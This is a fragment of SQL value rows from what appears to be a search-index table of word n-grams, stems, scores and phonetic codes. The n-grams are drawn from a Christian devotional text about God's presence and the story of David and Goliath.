(294362, 'heed to how', 'heed to how', 0, 1, 1.3667, 'H300', 1, '*'),
(294363, 'high shall', 'high shall', 0, 1, 1.3333, 'H240', 1, '*'),
(294364, 'high shall abide', 'high shall abide', 0, 1, 1.5333, 'H2413', 1, '*'),
(294365, 'him without', 'him without', 0, 1, 1.3667, 'H530', 1, '*'),
(294366, 'him without putting', 'him without putting', 0, 1, 1.6333, 'H531352', 1, '*'),
(294367, 'himself said', 'himself said', 0, 1, 1.4, 'H524123', 1, '*'),
(294368, 'himself said the', 'himself said the', 0, 1, 1.5333, 'H524123', 1, '*'),
(294369, 'his hands the', 'hi hands the', 0, 1, 1.4333, 'H25323', 1, '*'),
(294370, 'his presence', 'hi presence', 0, 1, 1.4, 'H216252', 2, '*'),
(294371, 'his presence creates', 'hi presence creates', 0, 1, 1.6667, 'H216252632', 1, '*'),
(294372, 'his presence is', 'hi presence is', 0, 1, 1.5, 'H216252', 1, '*'),
(294373, 'his presence that', 'hi presence that', 0, 1, 1.5667, 'H2162523', 1, '*'),
(294374, 'his words let', 'hi words let', 0, 1, 1.4333, 'H263243', 1, '*'),
(294375, 'holy spirit take', 'holi spirit take', 0, 1, 1.5333, 'H421632', 1, '*'),
(294376, 'house in', 'hous in', 0, 1, 1.2667, 'H250', 1, '*'),
(294377, 'house in the', 'hous in the', 0, 1, 1.4, 'H253', 1, '*'),
(294378, 'housewife', 'housewif', 0, 0, 0.6, 'H210', 2, '*'),
(294379, 'housewife or', 'housewif or', 0, 1, 1.4, 'H216', 1, '*'),
(294380, 'housewife or a', 'housewif or a', 0, 1, 1.4667, 'H216', 1, '*'),
(294381, 'how can a', 'how can a', 0, 1, 1.3, 'H250', 1, '*'),
(294382, 'how to sustain', 'how to sustain', 0, 1, 1.4667, 'H3235', 1, '*'),
(294383, 'how you handle', 'how you handle', 0, 1, 1.4667, 'H534', 1, '*'),
(294384, 'i have taken', 'i have taken', 0, 1, 1.4, 'I1325', 1, '*'),
(294385, 'if you keep', 'if you keep', 0, 1, 1.3667, 'I121', 2, '*'),
(294386, 'in 2017 it', 'in 2017 it', 0, 1, 1.3333, 'I530', 1, '*'),
(294387, 'in his hands', 'in his hands', 0, 1, 1.4, 'I52532', 1, '*'),
(294388, 'in one of', 'in one of', 0, 1, 1.3, 'I510', 1, '*'),
(294389, 'in the journey', 'in the journey', 0, 1, 1.4667, 'I53265', 1, '*'),
(294390, 'in the morning', 'in the morning', 0, 1, 1.4667, 'I535652', 2, '*'),
(294391, 'in the secret', 'in the secret', 0, 1, 1.4333, 'I53263', 1, '*'),
(294392, 'in things that', 'in things that', 0, 1, 1.4667, 'I53523', 1, '*'),
(294393, 'in wrong', 'in wrong', 0, 1, 1.2667, 'I5652', 1, '*'),
(294394, 'in wrong relationships', 'in wrong relationships', 0, 1, 1.7333, 'I56526435212', 1, '*'),
(294395, 'into my', 'into my', 0, 1, 1.2333, 'I535', 1, '*'),
(294396, 'into my hand', 'into my hand', 0, 1, 1.4, 'I5353', 1, '*'),
(294397, 'involved in things', 'involv in things', 0, 1, 1.6, 'I514135352', 1, '*'),
(294398, 'is a struggle', 'is a struggle', 0, 1, 1.4333, 'I23624', 1, '*'),
(294399, 'is going with', 'is going with', 0, 1, 1.4333, 'I2523', 1, '*'),
(294400, 'is his', 'is his', 0, 1, 1.2, 'I200', 2, '*'),
(294401, 'is his presence', 'is his presence', 0, 1, 1.5, 'I216252', 1, '*'),
(294402, 'is our commonwealth', 'is our commonwealth', 0, 1, 1.6333, 'I262543', 1, '*'),
(294403, 'is real', 'is real', 0, 1, 1.2333, 'I264', 1, '*'),
(294404, 'is real don\'t', 'is real don', 0, 1, 1.4333, 'I264353', 1, '*'),
(294405, 'is there you', 'is there you', 0, 1, 1.4, 'I236', 1, '*'),
(294406, 'is who', 'is who', 0, 1, 1.2, 'I200', 1, '*'),
(294407, 'is who is', 'is who is', 0, 1, 1.3, 'I200', 1, '*'),
(294408, 'is your strength', 'is your strength', 0, 1, 1.5333, 'I26236523', 1, '*'),
(294409, 'it is his', 'it is his', 0, 1, 1.3, 'I320', 1, '*'),
(294410, 'it serious', 'it serious', 0, 1, 1.3333, 'I3262', 1, '*'),
(294411, 'it serious don\'t', 'it serious don', 0, 1, 1.5333, 'I3262353', 1, '*'),
(294412, 'it was the', 'it was the', 0, 1, 1.3333, 'I323', 2, '*'),
(294413, 'item 21', 'item 21', 0, 1, 1.2333, 'I350', 1, '*'),
(294414, 'item 21 from', 'item 21 from', 0, 1, 1.4, 'I35165', 1, '*'),
(294415, 'journey of life', 'journei of life', 0, 1, 1.5, 'J65141', 1, '*'),
(294416, 'k2 item 21', 'k2 item 21', 0, 1, 1.3333, 'K350', 1, '*'),
(294417, 'keep the presence', 'keep the presence', 0, 1, 1.5667, 'K1316252', 1, '*'),
(294418, 'kept themselves', 'kept themselves', 0, 1, 1.5, 'K1352412', 1, '*'),
(294419, 'kept themselves from', 'kept themselves from', 0, 1, 1.6667, 'K1352412165', 1, '*'),
(294420, 'key to success', 'kei to success', 0, 1, 1.4667, 'K320', 1, '*'),
(294421, 'kill a', 'kill a', 0, 1, 1.2, 'K400', 1, '*'),
(294422, 'kill a giant', 'kill a giant', 0, 1, 1.4, 'K4253', 1, '*'),
(294423, 'killed', 'kill', 0, 0, 0.4, 'K430', 1, '*'),
(294424, 'killed goliath', 'kill goliath', 0, 1, 1.4667, 'K43243', 1, '*'),
(294425, 'killed goliath how', 'kill goliath how', 0, 1, 1.6, 'K43243', 1, '*'),
(294426, 'killed goliath it', 'kill goliath it', 0, 1, 1.5667, 'K43243', 1, '*'),
(294427, 'know many', 'know many', 0, 1, 1.3, 'K500', 1, '*'),
(294428, 'know many people', 'know many people', 0, 1, 1.5333, 'K514', 1, '*'),
(294429, 'know many things', 'know many things', 0, 1, 1.5333, 'K5352', 1, '*'),
(294430, 'let your obedience', 'let your obedience', 0, 1, 1.6, 'L361352', 1, '*'),
(294431, 'life define the', 'life define the', 0, 1, 1.5, 'L13153', 1, '*'),
(294432, 'life is who', 'life is who', 0, 1, 1.3667, 'L120', 1, '*'),
(294433, 'life remain', 'life remain', 0, 1, 1.3667, 'L165', 1, '*'),
(294434, 'life remain broken', 'life remain broken', 0, 1, 1.6, 'L1651625', 1, '*'),
(294435, 'life watch', 'life watch', 0, 1, 1.3333, 'L132', 1, '*'),
(294436, 'life watch what', 'life watch what', 0, 1, 1.5, 'L1323', 1, '*'),
(294437, 'life you may', 'life you may', 0, 1, 1.4, 'L150', 1, '*'),
(294438, 'like that david', 'like that david', 0, 1, 1.5, 'L2313', 1, '*'),
(294439, 'lion', 'lion', 0, 0, 0.2667, 'L500', 1, '*'),
(294440, 'lion or', 'lion or', 0, 1, 1.2333, 'L560', 1, '*'),
(294441, 'lion or the', 'lion or the', 0, 1, 1.3667, 'L563', 1, '*'),
(294442, 'listed', 'list', 0, 0, 0.4, 'L230', 1, '*'),
(294443, 'listed below', 'list below', 0, 1, 1.4, 'L2314', 1, '*'),
(294444, 'listed below are', 'list below are', 0, 1, 1.5333, 'L23146', 1, '*'),
(294445, 'long that\'s', 'long that', 0, 1, 1.3667, 'L5232', 1, '*'),
(294446, 'long that\'s why', 'long that why', 0, 1, 1.5, 'L5232', 1, '*'),
(294447, 'long when', 'long when', 0, 1, 1.3, 'L525', 1, '*'),
(294448, 'long when he\'s', 'long when he', 0, 1, 1.4667, 'L5252', 1, '*'),
(294449, 'lord and i', 'lord and i', 0, 1, 1.3333, 'L6353', 1, '*'),
(294450, 'lord in your', 'lord in your', 0, 1, 1.4, 'L6356', 1, '*'),
(294451, 'lord that delivered', 'lord that delivered', 0, 1, 1.6333, 'L634163', 1, '*'),
(294452, 'man because', 'man because', 0, 1, 1.3667, 'M120', 1, '*'),
(294453, 'man because you', 'man because you', 0, 1, 1.5, 'M120', 1, '*'),
(294454, 'man in 2017', 'man in 2017', 0, 1, 1.3667, 'M000', 1, '*'),
(294455, 'many people key', 'mani people key', 0, 1, 1.5, 'M142', 1, '*'),
(294456, 'many things', 'mani things', 0, 1, 1.3667, 'M352', 1, '*'),
(294457, 'many things but', 'mani things but', 0, 1, 1.5, 'M35213', 1, '*'),
(294458, 'many things required', 'mani things required', 0, 1, 1.6667, 'M3526263', 1, '*'),
(294459, 'marriage will', 'marriag will', 0, 1, 1.4333, 'M624', 1, '*'),
(294460, 'marriage will be', 'marriag will be', 0, 1, 1.5333, 'M6241', 1, '*'),
(294461, 'may not know', 'mai not know', 0, 1, 1.4, 'M325', 1, '*'),
(294462, 'measure yourself', 'measur yourself', 0, 1, 1.5333, 'M26241', 1, '*'),
(294463, 'measure yourself as', 'measur yourself as', 0, 1, 1.6333, 'M262412', 1, '*'),
(294464, 'money and don\'t', 'monei and don', 0, 1, 1.5, 'M353', 1, '*'),
(294465, 'morning without', 'morn without', 0, 1, 1.5, 'M6523', 1, '*'),
(294466, 'morning without having', 'morn without having', 0, 1, 1.7333, 'M6523152', 1, '*'),
(294467, 'most high', 'most high', 0, 1, 1.3, 'M232', 1, '*'),
(294468, 'most high shall', 'most high shall', 0, 1, 1.5, 'M2324', 1, '*'),
(294469, 'mouth be a', 'mouth be a', 0, 1, 1.3333, 'M310', 1, '*'),
(294470, 'must know how', 'must know how', 0, 1, 1.4333, 'M2325', 2, '*'),
(294471, 'must sustain', 'must sustain', 0, 1, 1.4, 'M23235', 1, '*'),
(294472, 'must sustain whether', 'must sustain whether', 0, 1, 1.6667, 'M2323536', 1, '*'),
(294473, 'my hand', 'my hand', 0, 1, 1.2333, 'M300', 1, '*'),
(294474, 'not daniel', 'not daniel', 0, 1, 1.3333, 'N354', 1, '*'),
(294475, 'not daniel shadrach', 'not daniel shadrach', 0, 1, 1.6333, 'N3542362', 1, '*'),
(294476, 'not david', 'not david', 0, 1, 1.3, 'N313', 1, '*'),
(294477, 'not david that', 'not david that', 0, 1, 1.4667, 'N313', 1, '*'),
(294478, 'not how well', 'not how well', 0, 1, 1.4, 'N340', 1, '*'),
(294479, 'not know many', 'not know many', 0, 1, 1.4333, 'N325', 1, '*'),
(294480, 'obedience be', 'obedi be', 0, 1, 1.4, 'O13521', 1, '*'),
(294481, 'obedience be thorough', 'obedi be thorough', 0, 1, 1.7, 'O13521362', 1, '*'),
(294482, 'of anything', 'of anything', 0, 1, 1.3667, 'O15352', 1, '*'),
(294483, 'of anything that', 'of anything that', 0, 1, 1.5333, 'O153523', 1, '*'),
(294484, 'of david it', 'of david it', 0, 1, 1.3667, 'O1313', 1, '*'),
(294485, 'of god into', 'of god into', 0, 1, 1.3667, 'O12353', 1, '*'),
(294486, 'of god listed', 'of god listed', 0, 1, 1.4333, 'O123423', 1, '*'),
(294487, 'of life is', 'of life is', 0, 1, 1.3333, 'O1412', 1, '*'),
(294488, 'of the bear', 'of the bear', 0, 1, 1.3667, 'O1316', 1, '*'),
(294489, 'of them be', 'of them be', 0, 1, 1.3333, 'O1351', 1, '*'),
(294490, 'of your house', 'of your house', 0, 1, 1.4333, 'O162', 1, '*'),
(294491, 'or a business', 'or a business', 0, 1, 1.4333, 'O61252', 1, '*'),
(294492, 'or publicly', 'or publicly', 0, 1, 1.3667, 'O61424', 1, '*'),
(294493, 'or publicly what', 'or publicly what', 0, 1, 1.5333, 'O614243', 1, '*'),
(294494, 'or the fire', 'or the fire', 0, 1, 1.3667, 'O6316', 1, '*'),
(294495, 'or you are', 'or you are', 0, 1, 1.3333, 'O600', 1, '*'),
(294496, 'our commonwealth', 'our commonwealth', 0, 1, 1.5333, 'O62543', 1, '*'),
(294497, 'our commonwealth when', 'our commonwealth when', 0, 1, 1.7, 'O625435', 1, '*'),
(294498, 'over don\'t', 'over don', 0, 1, 1.3333, 'O16353', 1, '*'),
(294499, 'over don\'t get', 'over don get', 0, 1, 1.4667, 'O1635323', 1, '*'),
(294500, 'participate', 'particip', 0, 0, 0.7333, 'P63213', 1, '*'),
(294501, 'participate with', 'particip with', 0, 1, 1.5333, 'P63213', 1, '*'),
(294502, 'participate with you', 'particip with you', 0, 1, 1.6667, 'P63213', 1, '*'),
(294503, 'people key', 'peopl key', 0, 1, 1.3333, 'P420', 1, '*'),
(294504, 'people key to', 'peopl key to', 0, 1, 1.4333, 'P423', 1, '*'),
(294505, 'place of the', 'place of the', 0, 1, 1.4, 'P4213', 1, '*'),
(294506, 'place where', 'place where', 0, 1, 1.3667, 'P426', 1, '*'),
(294507, 'place where god\'s', 'place where god', 0, 1, 1.5667, 'P426232', 1, '*'),
(294508, 'poor for', 'poor for', 0, 1, 1.2667, 'P616', 1, '*'),
(294509, 'poor for long', 'poor for long', 0, 1, 1.4333, 'P616452', 1, '*'),
(294510, 'presence creates', 'presenc creates', 0, 1, 1.5333, 'P6252632', 1, '*'),
(294511, 'presence creates a', 'presenc creates a', 0, 1, 1.6, 'P6252632', 1, '*'),
(294512, 'presence is', 'presenc is', 0, 1, 1.3667, 'P6252', 1, '*'),
(294513, 'presence is real', 'presenc is real', 0, 1, 1.5333, 'P625264', 1, '*'),
(294514, 'presence is your', 'presenc is your', 0, 1, 1.5333, 'P62526', 1, '*'),
(294515, 'presence that', 'presenc that', 0, 1, 1.4333, 'P62523', 1, '*'),
(294516, 'presence that is', 'presenc that is', 0, 1, 1.5333, 'P625232', 1, '*'),
(294517, 'presence that you', 'presenc that you', 0, 1, 1.5667, 'P62523', 1, '*'),
(294518, 'privately', 'privat', 0, 0, 0.6, 'P6134', 1, '*'),
(294519, 'privately or', 'privat or', 0, 1, 1.4, 'P61346', 1, '*'),
(294520, 'privately or publicly', 'privat or publicly', 0, 1, 1.7, 'P613461424', 1, '*'),
(294521, 'publicly', 'publicli', 0, 0, 0.5333, 'P424', 1, '*'),
(294522, 'publicly what', 'publicli what', 0, 1, 1.4333, 'P4243', 1, '*'),
(294523, 'publicly what god', 'publicli what god', 0, 1, 1.5667, 'P424323', 1, '*'),
(294524, 'putting your', 'put your', 0, 1, 1.4, 'P3526', 1, '*'),
(294525, 'putting your case', 'put your case', 0, 1, 1.5667, 'P35262', 1, '*'),
(294526, 'real don\'t', 'real don', 0, 1, 1.3333, 'R4353', 1, '*'),
(294527, 'real don\'t measure', 'real don measure', 0, 1, 1.6, 'R4353526', 1, '*'),
(294528, 'relationships in', 'relationship in', 0, 1, 1.5333, 'R4352125', 2, '*'),
(294529, 'relationships in your', 'relationship in your', 0, 1, 1.7, 'R43521256', 1, '*'),
(294530, 'remain broken', 'remain broken', 0, 1, 1.4333, 'R51625', 1, '*'),
(294531, 'remain broken hearted', 'remain broken hearted', 0, 1, 1.7, 'R5162563', 1, '*'),
(294532, 'required from', 'requir from', 0, 1, 1.4333, 'R263165', 1, '*'),
(294533, 'required from you', 'requir from you', 0, 1, 1.5667, 'R263165', 1, '*'),
(294534, 'respect the', 'respect the', 0, 1, 1.3667, 'R2123', 1, '*'),
(294535, 'respect the things', 'respect the things', 0, 1, 1.6, 'R212352', 1, '*'),
(294536, 'says he', 'sai he', 0, 1, 1.2333, 'S000', 1, '*'),
(294537, 'says he that', 'sai he that', 0, 1, 1.4, 'S300', 1, '*'),
(294538, 'secret of', 'secret of', 0, 1, 1.3, 'S631', 1, '*'),
(294539, 'secret of david', 'secret of david', 0, 1, 1.5, 'S631313', 1, '*'),
(294540, 'secret place', 'secret place', 0, 1, 1.4, 'S63142', 1, '*'),
(294541, 'secret place of', 'secret place of', 0, 1, 1.5, 'S631421', 1, '*'),
(294542, 'serious don\'t get', 'seriou don get', 0, 1, 1.5667, 'S6235323', 1, '*'),
(294543, 'shadowof', 'shadowof', 0, 0, 0.5333, 'S310', 1, '*'),
(294544, 'shadowof the', 'shadowof the', 0, 1, 1.4, 'S313', 1, '*'),
(294545, 'shadowof the almighty', 'shadowof the almighty', 0, 1, 1.7, 'S3134523', 1, '*'),
(294546, 'shadrach', 'shadrach', 0, 0, 0.5333, 'S362', 1, '*'),
(294547, 'shadrach and', 'shadrach and', 0, 1, 1.4, 'S36253', 1, '*'),
(294548, 'shadrach and abednego', 'shadrach and abednego', 0, 1, 1.7, 'S362531352', 1, '*'),
(294549, 'shall abide', 'shall abide', 0, 1, 1.3667, 'S413', 1, '*'),
(294550, 'shall abide under', 'shall abide under', 0, 1, 1.5667, 'S413536', 1, '*'),
(294551, 'shield for', 'shield for', 0, 1, 1.3333, 'S4316', 1, '*'),
(294552, 'shield for you', 'shield for you', 0, 1, 1.4667, 'S4316', 1, '*'),
(294553, 'sick for', 'sick for', 0, 1, 1.2667, 'S160', 1, '*'),
(294554, 'sick for long', 'sick for long', 0, 1, 1.4333, 'S16452', 1, '*'),
(294555, 'sin don\'t', 'sin don', 0, 1, 1.3, 'S5353', 1, '*'),
(294556, 'sin don\'t ever', 'sin don ever', 0, 1, 1.4667, 'S535316', 1, '*'),
(294557, 'so many things', 'so many things', 0, 1, 1.4667, 'S5352', 1, '*'),
(294558, 'soon titled', 'soon titled', 0, 1, 1.3667, 'S5343', 1, '*'),
(294559, 'soon titled the', 'soon titled the', 0, 1, 1.5, 'S5343', 1, '*'),
(294560, 'spirit over don\'t', 'spirit over don', 0, 1, 1.5667, 'S16316353', 1, '*'),
(294561, 'spirit take', 'spirit take', 0, 1, 1.3667, 'S1632', 1, '*'),
(294562, 'spirit take heed', 'spirit take heed', 0, 1, 1.5333, 'S16323', 1, '*'),
(294563, 'stone', 'stone', 0, 0, 0.3333, 'S350', 1, '*'),
(294564, 'stone thrown', 'stone thrown', 0, 1, 1.4, 'S35365', 1, '*'),
(294565, 'stone thrown by', 'stone thrown by', 0, 1, 1.5, 'S353651', 1, '*'),
(294566, 'strength everything', 'strength everything', 0, 1, 1.6333, 'S3652316352', 1, '*'),
(294567, 'strength everything can', 'strength everything can', 0, 1, 1.7667, 'S36523163525', 1, '*'),
(294568, 'strong man', 'strong man', 0, 1, 1.3333, 'S36525', 1, '*'),
(294569, 'strong man because', 'strong man because', 0, 1, 1.6, 'S3652512', 1, '*'),
(294570, 'struggle in your', 'struggl in your', 0, 1, 1.5333, 'S362456', 1, '*'),
(294571, 'success in the', 'success in the', 0, 1, 1.4667, 'S530', 1, '*'),
(294572, 'suffer long', 'suffer long', 0, 1, 1.3667, 'S16452', 1, '*'),
(294573, 'suffer long when', 'suffer long when', 0, 1, 1.5333, 'S164525', 1, '*'),
(294574, 'sustain the', 'sustain the', 0, 1, 1.3667, 'S353', 1, '*'),
(294575, 'sustain the presence', 'sustain the presence', 0, 1, 1.6667, 'S35316252', 1, '*'),
(294576, 'sustain whether', 'sustain whether', 0, 1, 1.5, 'S3536', 1, '*'),
(294577, 'sustain whether you', 'sustain whether you', 0, 1, 1.6333, 'S3536', 1, '*'),
(294578, 'take it serious', 'take it serious', 0, 1, 1.5, 'T23262', 1, '*'),
(294579, 'taken time', 'taken time', 0, 1, 1.3333, 'T2535', 1, '*'),
(294580, 'taken time to', 'taken time to', 0, 1, 1.4333, 'T25353', 1, '*'),
(294581, 'that david', 'that david', 0, 1, 1.3333, 'T130', 1, '*'),
(294582, 'that david himself', 'that david himself', 0, 1, 1.6, 'T135241', 1, '*'),
(294583, 'that delivered', 'that delivered', 0, 1, 1.4667, 'T4163', 1, '*'),
(294584, 'that delivered me', 'that delivered me', 0, 1, 1.5667, 'T41635', 1, '*'),
(294585, 'that draw', 'that draw', 0, 1, 1.3, 'T600', 1, '*'),
(294586, 'that draw the', 'that draw the', 0, 1, 1.4333, 'T630', 1, '*'),
(294587, 'that dwelleth', 'that dwelleth', 0, 1, 1.4333, 'T430', 1, '*'),
(294588, 'that dwelleth in', 'that dwelleth in', 0, 1, 1.5333, 'T435', 1, '*'),
(294589, 'that grieve', 'that grieve', 0, 1, 1.3667, 'T261', 2, '*'),
(294590, 'that grieve the', 'that grieve the', 0, 1, 1.5, 'T2613', 2, '*'),
(294591, 'that has to', 'that has to', 0, 1, 1.3667, 'T230', 2, '*'),
(294592, 'that is our', 'that is our', 0, 1, 1.3667, 'T260', 1, '*'),
(294593, 'that kept', 'that kept', 0, 1, 1.3, 'T213', 1, '*'),
(294594, 'that kept themselves', 'that kept themselves', 0, 1, 1.6667, 'T21352412', 1, '*'),
(294595, 'that killed', 'that killed', 0, 1, 1.3667, 'T243', 1, '*'),
(294596, 'that killed goliath', 'that killed goliath', 0, 1, 1.6333, 'T243243', 1, '*'),
(294597, 'that\'s the', 'that the', 0, 1, 1.3333, 'T230', 1, '*'),
(294598, 'that\'s the presence', 'that the presence', 0, 1, 1.6333, 'T2316252', 1, '*'),
(294599, 'that\'s why the', 'that why the', 0, 1, 1.4667, 'T230', 1, '*'),
(294600, 'the almighty', 'the almighty', 0, 1, 1.4, 'T4523', 1, '*'),
(294601, 'the almighty his', 'the almighty his', 0, 1, 1.5333, 'T45232', 1, '*'),
(294602, 'the assignment that', 'the assignment that', 0, 1, 1.6333, 'T253', 1, '*'),
(294603, 'the bear', 'the bear', 0, 1, 1.2667, 'T160', 1, '*'),
(294604, 'the bear will', 'the bear will', 0, 1, 1.4333, 'T164', 1, '*'),
(294605, 'the books coming', 'the books coming', 0, 1, 1.5333, 'T1252', 1, '*'),
(294606, 'the callings', 'the callings', 0, 1, 1.4, 'T2452', 1, '*'),
(294607, 'the callings of', 'the callings of', 0, 1, 1.5, 'T24521', 1, '*'),
(294608, 'the fire it', 'the fire it', 0, 1, 1.3667, 'T163', 1, '*'),
(294609, 'the hand', 'the hand', 0, 1, 1.2667, 'T530', 2, '*'),
(294610, 'the hand of', 'the hand of', 0, 1, 1.3667, 'T531', 2, '*'),
(294611, 'the lion', 'the lion', 0, 1, 1.2667, 'T450', 1, '*'),
(294612, 'the lion or', 'the lion or', 0, 1, 1.3667, 'T456', 1, '*'),
(294613, 'the morning without', 'the morning without', 0, 1, 1.6333, 'T56523', 1, '*'),
(294614, 'the most high', 'the most high', 0, 1, 1.4333, 'T5232', 1, '*'),
(294615, 'the presence that', 'the presence that', 0, 1, 1.5667, 'T162523', 1, '*'),
(294616, 'the secret', 'the secret', 0, 1, 1.3333, 'T263', 1, '*'),
(294617, 'the secret of', 'the secret of', 0, 1, 1.4333, 'T2631', 1, '*'),
(294618, 'the secret place', 'the secret place', 0, 1, 1.5333, 'T263142', 1, '*'),
(294619, 'the shadowof', 'the shadowof', 0, 1, 1.4, 'T231', 1, '*'),
(294620, 'the shadowof the', 'the shadowof the', 0, 1, 1.5333, 'T2313', 1, '*'),
(294621, 'the things that', 'the things that', 0, 1, 1.5, 'T523', 1, '*'),
(294622, 'them and that\'s', 'them and that', 0, 1, 1.5, 'T532', 1, '*'),
(294623, 'them be', 'them be', 0, 1, 1.2333, 'T510', 1, '*'),
(294624, 'them be born', 'them be born', 0, 1, 1.4, 'T5165', 1, '*'),
(294625, 'them deeply', 'them deeply', 0, 1, 1.3667, 'T5314', 1, '*'),
(294626, 'them deeply in', 'them deeply in', 0, 1, 1.4667, 'T53145', 1, '*'),
(294627, 'themselves from', 'themselv from', 0, 1, 1.5, 'T52412165', 1, '*'),
(294628, 'themselves from the', 'themselv from the', 0, 1, 1.6333, 'T524121653', 1, '*'),
(294629, 'there are so', 'there are so', 0, 1, 1.4, 'T620', 1, '*'),
(294630, 'there you cannot', 'there you cannot', 0, 1, 1.5333, 'T6253', 1, '*'),
(294631, 'things but', 'thing but', 0, 1, 1.3333, 'T5213', 1, '*'),
(294632, 'things but if', 'thing but if', 0, 1, 1.4333, 'T52131', 1, '*'),
(294633, 'things required', 'thing required', 0, 1, 1.5, 'T526263', 1, '*'),
(294634, 'things required from', 'thing required from', 0, 1, 1.6667, 'T526263165', 1, '*'),
(294635, 'things that grieve', 'thing that grieve', 0, 1, 1.6, 'T523261', 1, '*'),
(294636, 'things that has', 'thing that has', 0, 1, 1.5, 'T5232', 1, '*'),
(294637, 'thorough', 'thorough', 0, 0, 0.5333, 'T620', 1, '*'),
(294638, 'thorough and', 'thorough and', 0, 1, 1.4, 'T6253', 1, '*'),
(294639, 'thorough and complete', 'thorough and complete', 0, 1, 1.7, 'T625325143', 1, '*'),
(294640, 'through that', 'through that', 0, 1, 1.4, 'T623', 2, '*'),
(294641, 'through that was', 'through that was', 0, 1, 1.5333, 'T6232', 1, '*'),
(294642, 'thrown', 'thrown', 0, 0, 0.4, 'T650', 1, '*'),
(294643, 'thrown by', 'thrown by', 0, 1, 1.3, 'T651', 1, '*'),
(294644, 'thrown by a', 'thrown by a', 0, 1, 1.3667, 'T651', 1, '*'),
(294645, 'time to explain', 'time to explain', 0, 1, 1.5, 'T532145', 1, '*'),
(294646, 'titled', 'titl', 0, 0, 0.4, 'T430', 1, '*'),
(294647, 'titled the', 'titl the', 0, 1, 1.3333, 'T430', 1, '*'),
(294648, 'titled the presence', 'titl the presence', 0, 1, 1.6333, 'T4316252', 1, '*'),
(294649, 'to developing', 'to developing', 0, 1, 1.4333, 'T14152', 1, '*'),
(294650, 'to developing you', 'to developing you', 0, 1, 1.5667, 'T14152', 1, '*'),
(294651, 'to explain', 'to explain', 0, 1, 1.3333, 'T2145', 1, '*'),
(294652, 'to explain them', 'to explain them', 0, 1, 1.5, 'T214535', 1, '*'),
(294653, 'to how', 'to how', 0, 1, 1.2, 'T000', 1, '*'),
(294654, 'to how you', 'to how you', 0, 1, 1.3333, 'T000', 1, '*'),
(294655, 'to participate', 'to participate', 0, 1, 1.4667, 'T163213', 1, '*'),
(294656, 'to participate with', 'to participate with', 0, 1, 1.6333, 'T163213', 1, '*'),
(294657, 'to success in', 'to success in', 0, 1, 1.4333, 'T250', 1, '*'),
(294658, 'to sustain the', 'to sustain the', 0, 1, 1.4667, 'T2353', 1, '*'),
(294659, 'to trade', 'to trade', 0, 1, 1.2667, 'T630', 1, '*'),
(294660, 'to trade the', 'to trade the', 0, 1, 1.4, 'T630', 1, '*'),
(294661, 'trade', 'trade', 0, 0, 0.3333, 'T630', 1, '*'),
(294662, 'trade the', 'trade the', 0, 1, 1.3, 'T630', 1, '*'),
(294663, 'trade the presence', 'trade the presence', 0, 1, 1.6, 'T6316252', 1, '*'),
(294664, 'tremble', 'trembl', 0, 0, 0.4667, 'T6514', 1, '*'),
(294665, 'tremble at', 'trembl at', 0, 1, 1.3333, 'T65143', 1, '*'),
(294666, 'tremble at his', 'trembl at his', 0, 1, 1.4667, 'T651432', 1, '*'),
(294667, 'under the shadowof', 'under the shadowof', 0, 1, 1.6, 'U5363231', 1, '*'),
(294668, 'us to trade', 'us to trade', 0, 1, 1.3667, 'U2363', 1, '*'),
(294669, 'very strong', 'veri strong', 0, 1, 1.3667, 'V623652', 1, '*'),
(294670, 'very strong man', 'veri strong man', 0, 1, 1.5, 'V6236525', 1, '*'),
(294671, 'walking there', 'walk there', 0, 1, 1.4333, 'W425236', 1, '*'),
(294672, 'walking there are', 'walk there are', 0, 1, 1.5667, 'W425236', 1, '*'),
(294673, 'wants us', 'want us', 0, 1, 1.2667, 'W532', 2, '*'),
(294674, 'wants us to', 'want us to', 0, 1, 1.3667, 'W5323', 2, '*'),
(294675, 'was not daniel', 'wa not daniel', 0, 1, 1.4667, 'W25354', 1, '*'),
(294676, 'was not david', 'wa not david', 0, 1, 1.4333, 'W25313', 1, '*'),
(294677, 'was the presence', 'wa the presence', 0, 1, 1.5333, 'W2316252', 1, '*'),
(294678, 'was the secret', 'wa the secret', 0, 1, 1.4667, 'W23263', 1, '*'),
(294679, 'watch what', 'watch what', 0, 1, 1.3333, 'W323', 1, '*'),
(294680, 'watch what comes', 'watch what comes', 0, 1, 1.5333, 'W323252', 1, '*'),
(294681, 'well you are', 'well you are', 0, 1, 1.4, 'W460', 1, '*'),
(294682, 'what comes', 'what comes', 0, 1, 1.3333, 'W3252', 1, '*'),
(294683, 'what comes out', 'what comes out', 0, 1, 1.4667, 'W32523', 1, '*'),
(294684, 'when he\'s', 'when he', 0, 1, 1.3, 'W520', 1, '*'),
(294685, 'when he\'s there', 'when he there', 0, 1, 1.5, 'W5236', 1, '*'),
(294686, 'where god\'s', 'where god', 0, 1, 1.3667, 'W6232', 1, '*'),
(294687, 'where god\'s presence', 'where god presence', 0, 1, 1.6667, 'W623216252', 1, '*'),
(294688, 'who is going', 'who is going', 0, 1, 1.4, 'W252', 1, '*'),
(294689, 'why the', 'why the', 0, 1, 1.2333, 'W300', 1, '*'),
(294690, 'why the devil', 'why the devil', 0, 1, 1.4333, 'W314', 1, '*'),
(294691, 'will deliver', 'will deliver', 0, 1, 1.4, 'W43416', 1, '*'),
(294692, 'will deliver you', 'will deliver you', 0, 1, 1.5333, 'W43416', 1, '*'),
(294693, 'will get', 'will get', 0, 1, 1.2667, 'W423', 1, '*'),
(294694, 'will get you', 'will get you', 0, 1, 1.4, 'W423', 1, '*'),
(294695, 'will sustain the', 'will sustain the', 0, 1, 1.5333, 'W42353', 1, '*'),
(294696, 'with him without', 'with him without', 0, 1, 1.5333, 'W353', 1, '*'),
(294697, 'with the callings', 'with the callings', 0, 1, 1.5667, 'W32452', 1, '*'),
(294698, 'without having', 'without having', 0, 1, 1.4667, 'W3152', 1, '*'),
(294699, 'without having a', 'without having a', 0, 1, 1.5333, 'W3152', 1, '*'),
(294700, 'without putting', 'without putting', 0, 1, 1.5, 'W31352', 1, '*'),
(294701, 'without putting your', 'without putting your', 0, 1, 1.6667, 'W313526', 1, '*'),
(294702, 'words let your', 'word let your', 0, 1, 1.4667, 'W632436', 1, '*'),
(294703, 'worshipper', 'worshipp', 0, 0, 0.6667, 'W6216', 1, '*'),
(294704, 'worshipper respect', 'worshipp respect', 0, 1, 1.6, 'W62162123', 1, '*'),
(294705, 'worshipper respect the', 'worshipp respect the', 0, 1, 1.7333, 'W62162123', 1, '*'),
(294706, 'wrong relationships in', 'wrong relationships in', 0, 1, 1.7333, 'W65264352125', 1, '*'),
